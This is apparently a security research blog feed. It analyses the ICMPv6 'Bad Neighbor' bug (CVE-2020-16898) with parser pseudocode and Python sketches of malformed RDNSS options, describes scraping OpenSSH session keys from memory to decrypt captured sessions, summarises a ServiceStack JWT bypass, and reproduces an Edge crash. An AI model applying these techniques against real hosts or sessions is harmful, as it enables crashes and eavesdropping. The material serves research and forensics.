
Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

11 November 2020 at 19:59

On Patch Tuesday, October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug received a lot of attention because it was published as an RCE vulnerability, meaning that a successful exploit could be made wormable. It was initially given a high CVSS score of 9.8/10, which was later lowered to 8.8.

In the days following the publication, several write-ups and POCs were published. We looked at some of them:

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD).

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-

As can be seen from the packet structure, the packet consists of a 16-byte header, followed by a variable number of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.

The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Length    |           Reserved            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Lifetime                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
:            Addresses of IPv6 Recursive DNS Servers            :
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n, which is always odd. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.
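To make the length rule concrete, here is a minimal Python sketch that packs an RDNSS option following the layout above and checks whether a Length value is well formed. The helper names (`build_rdnss_option`, `rdnss_length_is_well_formed`) and the default lifetime are our own choices for illustration and do not come from any POC.

```python
import ipaddress
import struct

RDNSS_TYPE = 25  # Recursive DNS Server option type


def build_rdnss_option(addresses, lifetime=600):
    """Pack an RDNSS option: 8-byte header followed by 16 bytes per address."""
    body = b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    length = 1 + 2 * len(addresses)  # Length is counted in units of 8 bytes
    header = struct.pack("!BBHI", RDNSS_TYPE, length, 0, lifetime)
    return header + body


def rdnss_length_is_well_formed(length):
    """A well-formed Length is odd and covers at least one address."""
    return length >= 3 and length % 2 == 1


opt = build_rdnss_option(["fe80::1", "fe80::2"])
print(len(opt), opt[1])  # 40 5
print(rdnss_length_is_well_formed(4))  # False: an even Length is malformed
```

With two addresses the option is 40 bytes on the wire and the Length field is 5. An even value such as 4 can never be produced by this rule, which is exactly the case the vulnerable code mishandles.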

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-byte buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the number of IPv6 addresses, which is calculated as follows:

amount_of_addr = (length - 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration. 

Specifically in this POC, 34 is not a valid length for an option of type 24, but because it wasn’t validated, the processing continues and too many bytes are copied onto the stack, causing a stack overflow. Note that fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).
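The disagreement between the two iterations can be reproduced with a small Python model. This is only a sketch of the skipping logic described above, not the tcpip.sys code: `walk_options` is a hypothetical helper, and the option bytes are a made-up minimal example rather than the POC packet.

```python
def walk_options(data, rdnss_aware):
    """Return (offset, type, length) for each option the walker visits."""
    seen, off = [], 0
    while len(data) - off >= 2:
        opt_type, length = data[off], data[off + 1]
        size = length * 8
        if size == 0 or size > len(data) - off:
            break  # both loops reject zero-length or over-long options
        seen.append((off, opt_type, length))
        if rdnss_aware and opt_type == 25:
            # Model of the second loop: skip the header plus whole addresses only.
            size = 8 + 16 * ((length - 1) // 2)
        off += size
    return seen


rdnss = bytes([25, 4]) + bytes(6)         # RDNSS header with an even Length of 4
rdnss += bytes(16)                        # the single address the second loop consumes
rdnss += bytes([3, 2]) + bytes(6)         # last 8 bytes: a hidden type-3 option header
filler = (bytes([1, 1]) + bytes(6)) * 2   # two ordinary 8-byte options
packet_options = rdnss + filler

first = walk_options(packet_options, rdnss_aware=False)
second = walk_options(packet_options, rdnss_aware=True)
print(first)   # [(0, 25, 4), (32, 1, 1), (40, 1, 1)]
print(second)  # [(0, 25, 4), (24, 3, 2), (40, 1, 1)]
```

The first walk never looks at offset 24, so whatever option header is placed there reaches the second walk without having passed any of the first loop's checks.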

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

void Ipv6pHandleRouterAdvertisement(...)
{
    // Initialization and other code...

    if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
        // error

    // Initialization and other code...

    NET_BUFFER* NetBuffer = /* ... */;

    // First loop
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 1: // Source Link-layer Address
            // ...
            break;

        case 3: // Prefix Information
            if (OptionLenInBytes != 0x20)
                // error

            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
            if (PrefixInfoPrefixLength > 128)
                // error
            break;

        case 5: // MTU
            // ...
            break;

        case 24: // Route Information Option
            if (OptionLenInBytes > 0x18)
                // error

            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            if (RouteInfoPrefixLength > 128 ||
                (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
                (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
                // error
            break;

        case 25: // Recursive DNS Server Option
            if (OptionLenInBytes < 0x18)
                // error

            // Added after the patch - this is the fix
            //if ((OptionLenInBytes - 8) % 16 != 0)
            //    // error
            break;

        case 31: // DNS Search List Option
            if (OptionLenInBytes < 0x10)
                // error
            break;
        }

        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }

    // Rewind NetBuffer and do other stuff...

    // Second loop...
    while (NetBuffer->DataLength >= 2)
    {
        BYTE TempTypeLen[2];
        BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
        WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
        if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
            // error

        BOOL AdvanceBuffer = TRUE;

        BYTE OptionType = TempTypeLenPtr[0];
        switch (OptionType)
        {
        case 3: // Prefix Information
            BYTE TempPrefixInfo[0x20];
            BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
            BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
            // Lots of code. Assumptions:
            // PrefixInfoPrefixLength <= 128
            break;

        case 24: // Route Information Option
            BYTE TempRouteInfo[0x18];
            BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
            BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
            // Some code. Assumptions:
            // RouteInfoPrefixLength <= 128
            // Other, less interesting assumptions about RouteInfoPrefixLength
            break;

        case 25: // Recursive DNS Server Option
            Ipv6pUpdateRDNSS(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;

        case 31: // DNS Search List Option
            Ipv6pUpdateDNSSL(..., NetBuffer, ...);
            AdvanceBuffer = FALSE;
            break;
        }

        if (AdvanceBuffer)
        {
            NetBuffer->DataOffset += OptionLenInBytes;
            NetBuffer->DataLength -= OptionLenInBytes;
            // Other adjustments for NetBuffer...
        }
    }

    // More code...
}

As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even fewer options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 25 (Recursive DNS Server Option) and 31 (DNS Search List Option) are handled by functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies.

That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overwritten later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.
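The first-loop checks listed above can be restated as a single predicate. The Python sketch below is our own transcription of the simplified pseudocode, with a hypothetical function name and a `patched` flag added for illustration; it is not the actual driver logic.

```python
def first_loop_accepts(opt_type, size, prefix_len=0, patched=True):
    """Model of the per-option checks made by the first loop.

    size is the option size in bytes (Length field * 8).
    """
    if opt_type == 3:   # Prefix Information
        return size == 0x20 and prefix_len <= 128
    if opt_type == 24:  # Route Information
        if size > 0x18 or prefix_len > 128:
            return False
        if prefix_len > 64 and size < 0x18:
            return False
        if prefix_len > 0 and size < 0x10:
            return False
        return True
    if opt_type == 25:  # Recursive DNS Server
        if size < 0x18:
            return False
        # Check added by the patch: size must be 8 + n * 16 bytes.
        return not patched or (size - 8) % 16 == 0
    if opt_type == 31:  # DNS Search List
        return size >= 0x10
    return True         # other types carry no assumptions that matter here


print(first_loop_accepts(24, 34 * 8))             # False: the oversized option from the POC
print(first_loop_accepts(3, 0x20, prefix_len=200))  # False: prefix length above 128
print(first_loop_accepts(25, 32, patched=False))  # True: even Length of 4 before the patch
print(first_loop_accepts(25, 32, patched=True))   # False: rejected after the patch
```

Every input for which this predicate returns False is something the second loop assumes it will never see, so these are the candidates for smuggling past validation on an unpatched system.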

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen overwrite the stack such that the stack cookie (the __security_cookie value) is overwritten, causing a system crash before the function returns.

We checked whether overwriting anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.


Decrypting OpenSSH sessions for fun and profit

11 November 2020 at 10:24

Author: Jelle Vergeer

Introduction

A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers. The customer had pcaps and a hypervisor snapshot of the system at the moment it was compromised. We started wondering if it was possible to decrypt the SSH session and gain knowledge of it by recovering key material from the memory snapshot. In this blogpost I will cover the research I have done into OpenSSH and release some tools to dump OpenSSH session keys from memory and decrypt and parse sessions in combination with pcaps. I have also submitted my research to the 2020 Volatility framework plugin contest.

SSH Protocol

Firstly, I started reading up on OpenSSH and its workings. Luckily, OpenSSH is open source, so we can easily download and read the implementation details. The RFCs, although a bit boring to read, were also a wealth of information. From a high-level overview, the SSH protocol looks like the following:

  1. SSH protocol + software version exchange
  2. Algorithm negotiation (KEX INIT)
    • Key exchange algorithms
    • Encryption algorithms
    • MAC algorithms
    • Compression algorithms
  3. Key Exchange
  4. User authentication
  5. Client requests a channel of type “session”
  6. Client requests a pseudo terminal
  7. Client interacts with session

Starting at the beginning, the client connects to the server and sends the protocol version and software version: SSH-2.0-OpenSSH_8.3. The server responds with its protocol and software version. After this initial protocol and software version exchange, all traffic is wrapped in SSH frames. An SSH frame consists primarily of a length, padding length, payload data, padding content, and the MAC of the frame. An example SSH frame:

Example SSH Frame parsed with dissect.cstruct

Before an encryption algorithm is negotiated and a session key is generated, the SSH frames are unencrypted, and even when a frame is encrypted, parts of it may remain in the clear depending on the algorithm. For example, aes256-gcm will not encrypt the 4-byte length field in the frame, but chacha20-poly1305 will.
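As an illustration of the frame layout, the following Python sketch builds and parses an unencrypted frame using only the standard library. It follows the binary packet format of RFC 4253 (a 4-byte length, a 1-byte padding length, payload, padding, optional MAC); the function names and the 8-byte block size are our own assumptions, and this is not the dissect.cstruct definition used in the research.

```python
import struct


def build_plain_frame(payload, block=8):
    """Wrap a payload in an unencrypted SSH frame (no MAC)."""
    # Pad so the whole frame is a multiple of the block size, with >= 4 bytes of padding.
    padding_length = block - ((5 + len(payload)) % block)
    if padding_length < 4:
        padding_length += block
    packet_length = 1 + len(payload) + padding_length
    return struct.pack("!IB", packet_length, padding_length) + payload + bytes(padding_length)


def parse_plain_frame(buf, mac_len=0):
    """Split an unencrypted SSH frame into its fields."""
    packet_length, padding_length = struct.unpack_from("!IB", buf, 0)
    payload_len = packet_length - padding_length - 1
    end = 4 + packet_length
    return {
        "packet_length": packet_length,
        "padding_length": padding_length,
        "payload": buf[5:5 + payload_len],
        "padding": buf[5 + payload_len:end],
        "mac": buf[end:end + mac_len],
    }


frame = build_plain_frame(bytes([21]))  # 21 is the SSH_MSG_NEWKEYS message number
parsed = parse_plain_frame(frame)
print(parsed["packet_length"], parsed["padding_length"], parsed["payload"])
```

The first payload byte is the message number, which is how a parser recognises messages such as KEXINIT (20) and NEWKEYS (21) while the stream is still unencrypted.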

Next up, the client will send a KEX_INIT message to the server to start negotiating parameters for the session, like the key exchange and encryption algorithms. Depending on the order of those algorithms, the client and server will pick the first preferred algorithm that is supported by both sides. Following the KEX_INIT message, several key exchange related messages are exchanged, after which a NEWKEYS message is sent from both sides. This message tells the other side everything is set up to start encrypting the session and the next frame in the stream will be encrypted. After both sides have put the new encryption keys into effect, the client will request user authentication and, depending on the authentication mechanisms configured on the server, do password, key, or other authentication. After the session is authenticated, the client will open a channel and request services over that channel based on the requested operation (ssh, sftp, scp, etc.).
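The "first preferred algorithm supported by both sides" rule can be sketched in a few lines of Python. RFC 4253 describes the choice for ciphers and MACs as the first name in the client's list that also appears in the server's list; key exchange method selection has extra conditions that this sketch ignores. The `negotiate` helper and the example lists are illustrative only.

```python
def negotiate(client_prefs, server_prefs):
    """Pick the first algorithm in the client's list that the server also offers."""
    offered = set(server_prefs)
    for name in client_prefs:
        if name in offered:
            return name
    return None  # no common algorithm: the connection would be dropped


client = ["chacha20-poly1305@openssh.com", "aes256-gcm@openssh.com", "aes128-ctr"]
server = ["aes128-ctr", "aes256-gcm@openssh.com"]
print(negotiate(client, server))  # aes256-gcm@openssh.com
```

Note that the client's ordering wins: the server lists aes128-ctr first, but the client prefers aes256-gcm@openssh.com, so that is what gets selected.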

Recovering the session keys

The first step in recovering the session keys was to analyze the OpenSSH source code and debug existing OpenSSH binaries. I tried compiling OpenSSH myself, logging the generated session keys somewhere, attaching a debugger, and searching for those keys in the memory of the program. Success! Session keys were kept in memory on the heap. Some more digging into the source code pointed me to the functions responsible for sending and receiving the NEWKEYS frame. I discovered there is a “ssh” structure which stores a “session_state” structure. This structure in turn holds all kinds of information related to the current SSH session, including a newkeys structure containing information relating to the encryption, MAC and compression algorithms. One level deeper we finally find the “sshenc” structure holding the name of the cipher, the key, the IV and the block length. Everything we need! A nice overview of the structure in OpenSSH is shown below:

SSHENC Structure and relations

And the definition of the sshenc structure:

SSHENC Structure

It’s difficult to find the key itself in memory (it’s just a string of random bytes), but the sshenc (and other) structures are more distinct, having some properties we can validate against. We can then scrape the entire memory address space of the program and validate each offset against these constraints. We can check for the following properties:

  • name, cipher, key and iv members are valid pointers
  • The name member points to a valid cipher name, which is equal to cipher->name
  • key_len is within a valid range
  • iv_len is within a valid range
  • block_size is within a valid range
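A minimal sketch of this constraint-based scan, run against a toy in-memory buffer rather than a live process, could look as follows. The 48-byte little-endian layout (name, cipher, enabled, key_len, iv_len, block_size, key, iv), the assumption that the cipher structure starts with its name pointer, the range limits, and the `Memory` helper are all assumptions made for this example. This is not the released script.

```python
import struct

# Assumed 64-bit layout: char *name; cipher *; int enabled;
# u_int key_len, iv_len, block_size; u_char *key; u_char *iv
SSHENC = struct.Struct("<QQiIIIQQ")
KNOWN_CIPHERS = {b"aes256-ctr", b"aes256-gcm@openssh.com", b"chacha20-poly1305@openssh.com"}


class Memory:
    """Toy address space: one contiguous region mapped at `base`."""

    def __init__(self, base, data):
        self.base, self.data = base, data

    def read(self, addr, size):
        off = addr - self.base
        if off < 0 or off + size > len(self.data):
            return None  # not a valid pointer into this region
        return self.data[off:off + size]

    def cstring(self, addr, limit=64):
        off = addr - self.base
        if not 0 <= off < len(self.data):
            return None
        return self.data[off:off + limit].split(b"\0", 1)[0]


def find_sshenc(mem, step=8):
    """Validate every aligned offset against the sshenc constraints."""
    hits = []
    for off in range(0, len(mem.data) - SSHENC.size + 1, step):
        name, cipher, _, key_len, iv_len, block, key, iv = SSHENC.unpack_from(mem.data, off)
        cipher_name = mem.cstring(name)
        if cipher_name not in KNOWN_CIPHERS:
            continue
        head = mem.read(cipher, 8)  # assumed: cipher->name is the first member
        if head is None or mem.cstring(struct.unpack("<Q", head)[0]) != cipher_name:
            continue
        if not (1 <= key_len <= 64 and iv_len <= 64 and 1 <= block <= 64):
            continue
        key_bytes, iv_bytes = mem.read(key, key_len), mem.read(iv, iv_len)
        if key_bytes is None or iv_bytes is None:
            continue
        hits.append({"cipher": cipher_name.decode(), "key": key_bytes, "iv": iv_bytes})
    return hits


# Build a toy region: name string, cipher struct, key, IV, then the sshenc itself.
BASE = 0x1000
blob = b"aes256-ctr".ljust(16, b"\0")                 # at BASE + 0
blob += struct.pack("<Q", BASE)                       # cipher struct at BASE + 16
blob += bytes(range(32))                              # key at BASE + 24
blob += bytes(range(16))                              # IV at BASE + 56
blob += SSHENC.pack(BASE, BASE + 16, 1, 32, 16, 16, BASE + 24, BASE + 56)
hits = find_sshenc(Memory(BASE, blob))
print(len(hits), hits[0]["cipher"], hits[0]["key"].hex())
```

On a real target the region list, pointer size and structure offsets would have to come from the process maps and the matching OpenSSH build, so the constants here should be treated as placeholders.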

If we validate against all these constraints we should be able to reliably find the sshenc structure. I started off by building a POC Python script which I could run on a live host, which attaches to processes and scrapes the memory for this structure. The source code for this script can be found here. It actually works rather well and outputs a JSON blob for each key found. So I demonstrated that I can recover the session keys from a live host with Python and ptrace, but how are we going to recover them from a memory snapshot? This is where Volatility comes into play. Volatility is a memory forensics framework written in Python with the ability to write custom plugins. With some effort, I was able to write a Volatility 2 plugin, analyze the memory snapshot and dump the session keys! For the Volatility 3 plugin contest I also ported the plugin to Volatility 3 and submitted the plugin and research to the contest. Fingers crossed!

Volatility 2 SSH Session Key Dumper output

Decrypting and parsing the traffic

The recovery of the session keys which are used to encrypt and decrypt the traffic was successful. Next up is decrypting the traffic! I started parsing some pcaps with pynids, a TCP parsing and reassembly library. I used our in-house developed dissect.cstruct library to parse data structures and developed a parsing framework to parse protocols like SSH. The parsing framework basically feeds the packets to the protocol parser in the correct order, so if the client sends 2 packets and the server replies with 3 packets, the packets will also be supplied in that same order to the parser. This is important to keep overall protocol state. The parser basically consumes SSH frames until a NEWKEYS frame is encountered, indicating the next frame is encrypted. Now the parser peeks at the next frame in the stream from that source and iterates over the supplied session keys, trying to decrypt the frame. If successful, the parser installs the session key in the state to decrypt the remaining frames in the session. The parser can handle pretty much all encryption algorithms supported by OpenSSH. The following animation tries to depict this process:
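The key-trial step can be sketched as follows. This is a simplified illustration, not the parser from the research: the plausibility heuristic (sane length and padding fields after decryption) is our assumption about what "successful" could mean, and `toy_xor` is a deliberately fake stand-in cipher so that the example runs without a crypto library. Real ciphers differ in which fields are encrypted, and AEAD modes can verify the authentication tag instead.

```python
import struct


def looks_like_ssh_frame(plain):
    """Heuristic (an assumption): the length and padding fields must be sane."""
    if len(plain) < 5:
        return False
    packet_length, padding_length = struct.unpack_from("!IB", plain, 0)
    return 4 + packet_length <= len(plain) and 4 <= padding_length < packet_length


def pick_session_key(encrypted_frame, candidates, decrypt):
    """Return the first candidate key whose decryption looks like a frame."""
    for key in candidates:
        if looks_like_ssh_frame(decrypt(key, encrypted_frame)):
            return key
    return None


def toy_xor(key, data):
    """Stand-in for a real cipher; NOT something OpenSSH uses."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


plain = struct.pack("!IB", 12, 10) + b"\x05" + bytes(10)  # a 16-byte plaintext frame
good, bad = b"\xaa\xbb\xcc\xdd", b"\x11\x22\x33\x44"
wire = toy_xor(good, plain)

chosen = pick_session_key(wire, [bad, good], toy_xor)
print(chosen == good)  # True
```

Once a key passes the check, it would be stored in the per-direction parser state and reused for every following frame from that side of the connection.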

SSH Protocol Parsing

And finally the parser in action, where you can see it decrypts and parses a SSH session, also exposing the password used by the user to authenticate:

Example decrypted and parsed SSH session

Conclusion

So to sum up, I researched the SSH protocol, how session keys are stored and kept in memory for OpenSSH, found a way to scrape them from memory and use them in a network parser to decrypt and parse SSH sessions to readable output. The scripts used in this research can be found here:

A potential next step or nice to have would be implementing this decrypter and parser into Wireshark.

Final thoughts

Funnily enough, during my research I also came across these commented lines in the ssh_set_newkeys function in the OpenSSH source. How ironic! If these lines were uncommented and compiled into the OpenSSH binaries, this research would have been much harder.

OpenSSH source code snippet


Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR

ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing attackers to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory.

Routine checks -> Auth bypass

During a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party OAuth service the web application used JWT tokens to track sessions and privileges.

Crash Reproduction Series: Microsoft Edge Legacy

2 November 2020 at 07:30

During yet another Digital Forensics investigation using ZecOps Crash Forensics Platform, we saw a crash of the Legacy (pre-Chromium) Edge browser. The crash was caused by a NULL pointer dereference bug, and we concluded that the root cause was a benign bug of the browser. Nevertheless, we thought that it would be a nice showcase of a crash reproduction.

Here’s the stack trace of the crash:

00007ffa`35f4a172     edgehtml!CMediaElement::IsSafeToUse+0x8
00007ffa`36c78124     edgehtml!TrackHelpers::GetStreamIndex+0x26
00007ffa`36c7121f     edgehtml!CSourceBuffer::RemoveAllTracksHelper<CTextTrack,CTextTrackList>+0x98
00007ffa`36880903     edgehtml!CMediaSourceExtension::Var_removeSourceBuffer+0xc3
00007ffa`364e5f95     edgehtml!CFastDOM::CMediaSource::Trampoline_removeSourceBuffer+0x43
00007ffa`3582ea87     edgehtml!CFastDOM::CMediaSource::Profiler_removeSourceBuffer+0x25
00007ffa`359d07b6     Chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x207
00007ffa`35834ab8     Chakra!amd64_CallFunction+0x86
00007ffa`35834d38     Chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x198
00007ffa`35834f99     Chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xb8
00007ffa`3582cd80     Chakra!Js::InterpreterStackFrame::ProcessProfiled+0x149
00007ffa`3582df9f     Chakra!Js::InterpreterStackFrame::Process+0xe0
00007ffa`3582cf9e     Chakra!Js::InterpreterStackFrame::InterpreterHelper+0x88f
0000016a`bacc1f8a     Chakra!Js::InterpreterStackFrame::InterpreterThunk+0x4e
00007ffa`359d07b6     0x0000016a`bacc1f8a
00007ffa`358141ea     Chakra!amd64_CallFunction+0x86
00007ffa`35813f0c     Chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x2aa
00007ffa`35813e4a     Chakra!Js::JavascriptFunction::CallRootFunction+0x7c
00007ffa`35813d29     Chakra!ScriptSite::CallRootFunction+0x6a
00007ffa`35813acb     Chakra!ScriptSite::Execute+0x179
00007ffa`362bebed     Chakra!ScriptEngineBase::Execute+0x19b
00007ffa`362bde49     edgehtml!CListenerDispatch::InvokeVar+0x41d
00007ffa`362bc6c2     edgehtml!CEventMgr::_InvokeListeners+0xd79
00007ffa`35fdf8f1     edgehtml!CEventMgr::Dispatch+0x922
00007ffa`35fe0089     edgehtml!CEventMgr::DispatchPointerEvent+0x215
00007ffa`35fe04f4     edgehtml!CEventMgr::DispatchClickEvent+0x1d1
00007ffa`36080f10     edgehtml!Tree::ElementNode::Fire_onclick+0x60
00007ffa`36080ca0     edgehtml!Tree::ElementNode::DoClick+0xf0
[...]

Amusingly, the browser crashed in the CMediaElement::IsSafeToUse function. Apparently, the answer is no – it isn’t safe to use.

Crash reproduction

The stack trace indicates that the function that was executed by the JavaScript code, and eventually caused the crash, was removeSourceBuffer, part of the MediaSource Web API. Looking for a convenient example to play with, we stumbled upon this page which uses the counterpart function, addSourceBuffer. We added a button that calls removeSourceBuffer and tried it out.

Just calling removeSourceBuffer didn’t cause a crash (otherwise it would be too easy, right?). To see how far we got, we attached a debugger and put a breakpoint on the edgehtml!CMediaSourceExtension::Var_removeSourceBuffer function, then did some stepping. We saw that the CSourceBuffer::RemoveAllTracksHelper function is not being called at all. What tracks does it help to remove?

